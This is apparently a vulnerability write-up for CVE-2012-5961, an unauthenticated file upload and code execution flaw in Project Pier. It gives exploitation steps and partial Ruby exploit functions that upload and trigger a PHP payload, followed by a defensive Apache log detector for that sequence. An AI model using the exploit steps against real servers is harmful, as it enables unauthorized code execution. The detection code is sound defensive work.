## Critical Vulnerability Information

- **Vulnerability Name**: Project Pier Arbitrary File Upload Vulnerability
- **Description**: This module exploits a vulnerability in Project Pier that allows malicious users to upload arbitrary files to the web server without authentication, and execute remote code.
- **Affected Versions**: Project Pier 0.8.1 and earlier
- **Affected Servers**: Apache servers (due to how extensions are processed)
- **CVE ID**: CVE-2012-5961
- **Release Date**: 2012-10-08
- **Platform**: Linux PHP
- **Targets**:
  - Generic (PHP Payload)
  - Linux x86
  - ARCH_CMD
- **Privilege Escalation**: No
- **Reliability**: Unknown
- **Stability**: Unknown
- **Side Effects**: Unknown

### Exploitation Steps

1. **Check Target**: Send a GET request to verify if the target is vulnerable.
2. **Upload File**: Use a POST request to upload a malicious PHP file.
3. **Execute Code**: Access the uploaded PHP file to execute malicious code.

### Related Code Snippets

```ruby
def upload_php(base, fname, php_payload, folder_name)
  data = Multipart::Message.new
  # Add form data and file
  res = send_request_cgi({
    'method' => 'POST',
    'uri'    => "#{base}/tools/uploaded_file.php",
    'ctype'  => "multipart/form-data; boundary=#{data.bound}",
    'data'   => post_data
  })
  return res.body if res
end

def exec_php(base, body)
  uri = body.scan(/\/(.+?)\//).flatten[0]
  res = send_request_raw({ 'uri' => "#{base}/tools#{uri}" })
  if res and res.code == 404
    print_error('The upload most likely failed')
    return
  end
end
```
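
A defender-side check for the sequence described above, as an added example that is not part of the original module: it scans Apache access-log lines for a POST to `tools/uploaded_file.php` followed by a request from the same client for another file under `tools/`. The log format, the 300-second window, the function names and the sample log lines are assumptions constructed for illustration.

```ruby
require 'time'
# Endpoint taken from the snippet above; WINDOW and the log format are assumptions.
UPLOAD_PATH = '/tools/uploaded_file.php'
WINDOW = 300 # seconds allowed between the upload and the follow-up request

# Apache common/combined log format: client, timestamp, method, path, status.
LINE_RE = %r{\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) }

def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  { ip: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3], path: m[4].split('?', 2).first, status: m[5].to_i }
end

# One finding per upload POST that the same client follows, within WINDOW seconds,
# with a request for another file under the same tools/ directory.
# Lines are assumed to be in log (chronological) order.
def find_upload_then_fetch(lines)
  pending = Hash.new { |h, k| h[k] = [] }
  findings = []
  lines.map { |l| parse_line(l) }.compact.each do |e|
    if e[:method] == 'POST' && e[:path].end_with?(UPLOAD_PATH)
      pending[e[:ip]] << { time: e[:time], base: e[:path].delete_suffix(UPLOAD_PATH) }
      next
    end
    up = pending[e[:ip]].find do |u|
      e[:path].start_with?("#{u[:base]}/tools/") &&
        !e[:path].end_with?(UPLOAD_PATH) && e[:time] - u[:time] <= WINDOW
    end
    next unless up
    pending[e[:ip]].delete(up)
    # The snippet treats a 404 on the follow-up request as a failed upload.
    outcome = e[:status] == 404 ? :failed_attempt : :file_served
    findings << { ip: e[:ip], fetched: e[:path], status: e[:status], outcome: outcome }
  end
  findings
end

# Constructed sample log lines (documentation address ranges, made-up paths).
SAMPLE_LOG = <<~LOG.lines
  203.0.113.5 - - [08/Oct/2012:10:00:00 +0000] "POST /pp/tools/uploaded_file.php HTTP/1.1" 200 512
  203.0.113.5 - - [08/Oct/2012:10:00:00 +0000] "GET /pp/tools/kq3x/sample.php HTTP/1.1" 200 20
  198.51.100.7 - - [08/Oct/2012:10:30:00 +0000] "GET /pp/tools/uploaded_file.php HTTP/1.1" 200 300
  198.51.100.7 - - [08/Oct/2012:11:00:00 +0000] "POST /pp/tools/uploaded_file.php HTTP/1.1" 200 512
  198.51.100.7 - - [08/Oct/2012:11:00:01 +0000] "GET /pp/tools/zz9/t.php HTTP/1.1" 404 210
  192.0.2.9 - - [08/Oct/2012:12:00:00 +0000] "POST /pp/tools/uploaded_file.php HTTP/1.1" 200 512
  192.0.2.9 - - [08/Oct/2012:12:10:00 +0000] "GET /pp/tools/other.js HTTP/1.1" 200 99
LOG
```

A `:file_served` finding means the follow-up request did not return 404 and the fetched path should be inspected on disk; `:failed_attempt` still records that the upload endpoint was exercised.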